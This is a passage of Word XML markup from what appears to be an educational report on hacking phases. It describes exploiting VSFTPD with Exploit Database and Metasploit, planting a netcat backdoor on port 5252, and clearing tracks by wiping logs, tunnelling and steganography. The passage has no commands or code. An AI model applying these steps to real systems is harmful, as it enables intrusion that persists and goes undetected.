          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>VSFTPD exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75271766" w14:textId="37B424AA" w:rsidR="00215697" w:rsidRPr="00FA5B3B" w:rsidRDefault="00CC7502" w:rsidP="0021569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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251713536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BE641D5" wp14:editId="14EF4C2D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731510" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="14457593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59352" name="Picture 14457593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38C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Knowing about the ftp service, the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00BD6EAB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>searches</w:t>
      </w:r>
      <w:r w:rsidR="00D7038C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BD6EAB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the service on exploit database.</w:t>
      </w:r>
      <w:r w:rsidR="00035545" w:rsidRPr="00FA5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F074A" w14:textId="523653C3" w:rsidR="00CA7BB5" w:rsidRPr="00FA5B3B" w:rsidRDefault="00171325" w:rsidP="00055180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2</w:t>
      </w:r>
      <w:r w:rsidR="00B64540" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC7502" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00F81108" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>xploit Database</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD2A05D" w14:textId="3F765DDF" w:rsidR="00CA7BB5" w:rsidRPr="00FA5B3B" w:rsidRDefault="00CC7502" w:rsidP="00CB46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A5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251714560" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2FCF5D86" wp14:editId="4F215B88">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>488950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="1535430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1029227931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7931" name="Picture 27" descr="A screen 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11F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacker can download the exploit </w:t>
      </w:r>
      <w:r w:rsidR="00C76318" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>script or use tools such as Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366AB8DE" w14:textId="5050F41E" w:rsidR="00CB46DC" w:rsidRPr="00FA5B3B" w:rsidRDefault="00055180" w:rsidP="00055180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2</w:t>
      </w:r>
      <w:r w:rsidR="00B64540" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC7502" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AFFA7D" w14:textId="05972DF7" w:rsidR="00001D3E" w:rsidRPr="00FA5B3B" w:rsidRDefault="00001D3E" w:rsidP="00001D3E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FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00F2004D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F2004D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Maintaining Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AB35D9" w14:textId="0899DFA9" w:rsidR="009C3803" w:rsidRPr="00FA5B3B" w:rsidRDefault="000D266B" w:rsidP="009C3803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The hacker </w:t>
      </w:r>
      <w:r w:rsidR="000764A6" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>establishes</w:t>
      </w:r>
      <w:r w:rsidR="005E398E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> persisten</w:t>
      </w:r>
      <w:r w:rsidR="000764A6" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="005E398E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> presence</w:t>
      </w:r>
      <w:r w:rsidR="003A3F27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0764A6" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>within the target</w:t>
      </w:r>
      <w:r w:rsidR="00237A68" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00062BFB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> The attacker </w:t>
      </w:r>
      <w:r w:rsidR="000764A6" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">can create backdoors </w:t>
      </w:r>
      <w:r w:rsidR="008207AB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">or install rootkits, </w:t>
      </w:r>
      <w:r w:rsidR="00933E8C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>malicious</w:t>
      </w:r>
      <w:r w:rsidR="008207AB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933E8C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>software</w:t>
      </w:r>
      <w:r w:rsidR="008207AB" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, allowing the hacker to </w:t>
      </w:r>
      <w:r w:rsidR="00933E8C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>use the system in the future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B768CC" w14:textId="50BB3E77" w:rsidR="00C76085" w:rsidRPr="00FA5B3B" w:rsidRDefault="00A13474" w:rsidP="009C3803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2C4EE36" wp14:editId="4FC394AA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1151255</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>563457</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3426460" cy="846455"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="592552133" name="Picture 29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52133" name="Picture 29" descr="A computer screen shot of numbers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02F07AA2" wp14:editId="0EBF1346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3461385" cy="321310"/>
            <wp:effectExtent l="0" t="0" r="5715" b="2540"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="19539162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16258" name="Picture 195391625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085" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002F1766" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">root privilege, </w:t>
      </w:r>
      <w:r w:rsidR="002F1766" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00CE7CBE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>he attacker creates a</w:t>
      </w:r>
      <w:r w:rsidR="009F315A" w:rsidRPr="00FA5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5A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CE7CBE" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> backdoor </w:t>
      </w:r>
      <w:r w:rsidR="00B80C5A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>at p</w:t>
      </w:r>
      <w:r w:rsidR="00B452CA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ort </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5252.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410D39EA" w14:textId="361BC2B1" w:rsidR="00A13474" w:rsidRPr="00FA5B3B" w:rsidRDefault="00B64540" w:rsidP="00B64540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 xml:space="preserve">Fig.28 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BBDA64" w14:textId="5F12EA80" w:rsidR="0019008D" w:rsidRPr="00FA5B3B" w:rsidRDefault="00001D3E" w:rsidP="0019008D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FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00F2004D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F2004D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Clearing </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F2004D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>tracks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="27BC1BB6" w14:textId="4762F751" w:rsidR="004A4669" w:rsidRPr="00FA5B3B" w:rsidRDefault="00F9068D" w:rsidP="00E73859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3AB6C78D" wp14:editId="2B1E7F7C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3826510</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1171575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="623358" cy="347133"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1901916691" name="Picture 190191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1591" name="Picture 97550159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9" t="15013" b="3858"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="623358" cy="3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34E96C5E" wp14:editId="5054B8C2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3572722</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1171575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="623358" cy="347133"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1093922654" name="Picture 109392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1591" name="Picture 97550159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9" t="15013" b="3858"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="623358" cy="3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60F769AE" wp14:editId="78409DA4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>490855</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>951230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4762500" cy="219710"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="41466610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66106" name="Picture 414666106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8" b="4499"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4762500" cy="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5BD66DB0" wp14:editId="76C350B2">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4629064</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1171575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="623358" cy="347133"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1489934821" name="Picture 148993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1591" name="Picture 97550159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9" t="15013" b="3858"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="623358" cy="3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071D4FE8" wp14:editId="0290B047">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4237990</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1171575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="623358" cy="347133"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="649533962" name="Picture 64953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1591" name="Picture 97550159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9" t="15013" b="3858"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="623358" cy="3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1FB784A0" wp14:editId="20D80B58">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2980267</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1163320</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="623358" cy="347133"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1168932361" name="Picture 116893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1591" name="Picture 97550159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9" t="15013" b="3858"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="623358" cy="3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09DE6B6B" wp14:editId="46392093">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>492972</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1500717</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4762500" cy="219710"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="72564338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3381" name="Picture 725643381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8" b="1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4762500" cy="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28659A0A" wp14:editId="74E92188">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>490855</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1171575</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2511425" cy="330200"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="97550159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1591" name="Picture 97550159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0" b="3859"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2511425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61D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="004B510F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">phase </w:t>
      </w:r>
      <w:r w:rsidR="00F253D7" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>involves</w:t>
      </w:r>
      <w:r w:rsidR="004B510F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> clearing evidence of the hacker presence</w:t>
      </w:r>
      <w:r w:rsidR="002B7BB0" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> including </w:t>
      </w:r>
      <w:r w:rsidR="009277F4" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>installing</w:t>
      </w:r>
      <w:r w:rsidR="002B7BB0" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> script</w:t>
      </w:r>
      <w:r w:rsidR="009277F4" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/ application used for the attack, modifying registry values, clearing </w:t>
      </w:r>
      <w:r w:rsidR="00BF3379" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>logs,</w:t>
      </w:r>
      <w:r w:rsidR="009277F4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ED282A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">and deleting folders created during the attack. </w:t>
      </w:r>
      <w:r w:rsidR="00F253D7" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker </w:t>
      </w:r>
      <w:r w:rsidR="007701E2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>also uses tunnelling</w:t>
      </w:r>
      <w:r w:rsidR="007677ED" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00BF3379" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>steganography,</w:t>
      </w:r>
      <w:r w:rsidR="007677ED" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and encryptions</w:t>
      </w:r>
      <w:r w:rsidR="007701E2" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to avoid detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C918D62" w14:textId="563AE8B7" w:rsidR="00820C3A" w:rsidRPr="00FA5B3B" w:rsidRDefault="00820C3A" w:rsidP="00820C3A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
